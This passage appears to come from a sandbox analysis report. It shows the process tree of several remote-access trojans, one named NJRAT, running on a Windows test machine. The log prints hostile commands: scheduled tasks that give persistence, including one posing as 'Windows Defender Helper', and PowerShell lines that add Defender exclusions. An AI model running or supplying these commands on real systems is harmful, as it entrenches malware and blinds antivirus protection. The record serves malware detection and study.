- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3780
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SendNotifyMessage
    PID:2008
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      PID:5476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OvgOu2TBuvfy.bat" "
      4⤵
      PID:2212
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4736
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1800
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4756
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        
        PID:4376
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W2mB3QjBkd3T.bat" "
        6⤵
        
        PID:2340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2276
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4868
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fsfs4r00j1zn.bat" "
        8⤵
        
        PID:4976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5156
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        
        PID:724
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:1044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hEKYBMi5GtnX.bat" "
        10⤵
        
        PID:5696
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:3472
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3764
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        
        PID:2728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8bNFE3aZW6QQ.bat" "
        12⤵
        
        PID:5456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:1740
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2436
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        13⤵
        Executes dropped EXE
        
        PID:3004
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iMq3LcMiXb9W.bat" "
        14⤵
        
        PID:3368
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5004
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        15⤵
        
        PID:3488
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WYMajnhuo0Ej.bat" "
        16⤵
        
        PID:4228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:5752
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        17⤵
        
        PID:4496
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kIYUHmQufkNP.bat" "
        18⤵
        
        PID:3436
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:2408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2800
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        19⤵
        
        PID:5456
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n2ZwgPI1Snqk.bat" "
        20⤵
        
        PID:4984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:4540
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        
        PID:3616
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        21⤵
        
        PID:1956
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        
        PID:2812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HV1GAAi8kSt2.bat" "
        22⤵
        
        PID:8
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:5256
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1876
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        23⤵
        
        PID:4228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WjnDZp0lpZkp.bat" "
        24⤵
        
        PID:4620
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:2532
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1364
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        25⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3340
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HR7UgXGyCB84.bat" "
        26⤵
        
        PID:5556
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:3636
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3924
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        27⤵
        
        PID:2496
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\trOFuPNBcK4V.bat" "
        28⤵
        
        PID:3048
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:4616
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3904
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        29⤵
        
        PID:3816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v68HZ9Edptoo.bat" "
        30⤵
        
        PID:3576
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:3684
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4968
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        31⤵
        
        PID:2872
- C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe
  "C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\NJRAT%20DANGEROUS.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NJRAT%20DANGEROUS.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3728
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NJRAT%20DANGEROUS" /tr "C:\Users\Admin\AppData\Roaming\NJRAT%20DANGEROUS.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3284
- C:\Users\Admin\Desktop\Files\defender64.exe
  "C:\Users\Admin\Desktop\Files\defender64.exe"
  2⤵
  - Executes dropped EXE
  PID:5584
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2276
- - C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
    "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SendNotifyMessage
    PID:5448
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y2eUivTotws2.bat" "
      4⤵
      PID:4128
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2540
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        Runs ping.exe
        
        PID:4496
    - - C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4800
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Q8YVLQ3xxH4G.bat" "
        6⤵
        
        PID:5112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:420
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:5256
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dlElW2Gw7qOZ.bat" "
        8⤵
        
        PID:4796
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4924
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4808
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C8soD2VhXIzl.bat" "
        10⤵
        
        PID:3728
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1104
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:1644
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        12⤵
        
        PID:3384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r2NXMyPSKQP4.bat" "
        12⤵
        
        PID:5976
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4984
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        13⤵
        Executes dropped EXE
        
        PID:3716
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        14⤵
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\im2QilAELAwQ.bat" "
        14⤵
        
        PID:5820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:2564
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        15⤵
        
        PID:412
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        16⤵
        
        PID:4376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgB6x5vF0xn1.bat" "
        16⤵
        
        PID:552
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:5704
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4744
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        17⤵
        
        PID:4992
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ezfApnrkpR8f.bat" "
        18⤵
        
        PID:4244
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:1000
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:716
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        19⤵
        
        PID:4376
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4yLwt5NnTIZE.bat" "
        20⤵
        
        PID:2104
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:5532
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        Runs ping.exe
        
        PID:5820
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        21⤵
        
        PID:5852
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cJTLoCrSQ8UD.bat" "
        22⤵
        
        PID:3812
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:1912
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        23⤵
        
        PID:1824
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kGstfpiHkwrd.bat" "
        24⤵
        
        PID:5024
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:1348
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3052
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        25⤵
        
        PID:3348
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PnbjvgIr1F2W.bat" "
        26⤵
        
        PID:3732
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:2744
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        27⤵
        
        PID:2632
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\N2jYQogeHXHX.bat" "
        28⤵
        
        PID:3616
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        29⤵
        
        PID:1336
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2880
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        29⤵
        
        PID:5672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        30⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pZ7BnMdpx5i.bat" "
        30⤵
        
        PID:404
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        31⤵
        
        PID:3984
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:244
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        31⤵
        
        PID:3168
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        32⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bb98l6YYvvA6.bat" "
        32⤵
        
        PID:4668
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        33⤵
        
        PID:6336
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6352
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        33⤵
        
        PID:6536
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\50RoOdcchRnJ.bat" "
        34⤵
        
        PID:6896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        35⤵
        
        PID:2296
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        35⤵
        Runs ping.exe
        
        PID:4804
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        35⤵
        
        PID:7968
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        36⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HWu9pgGnq5PX.bat" "
        36⤵
        
        PID:7608
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        37⤵
        
        PID:7672
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7164
        
        C:\Users\Admin\AppData\Roaming\en\defenderx64.exe
        
        "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"
        37⤵
        
        PID:7424
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f
        38⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8044
        
        C:\Windows\system32\cmd.exe
        
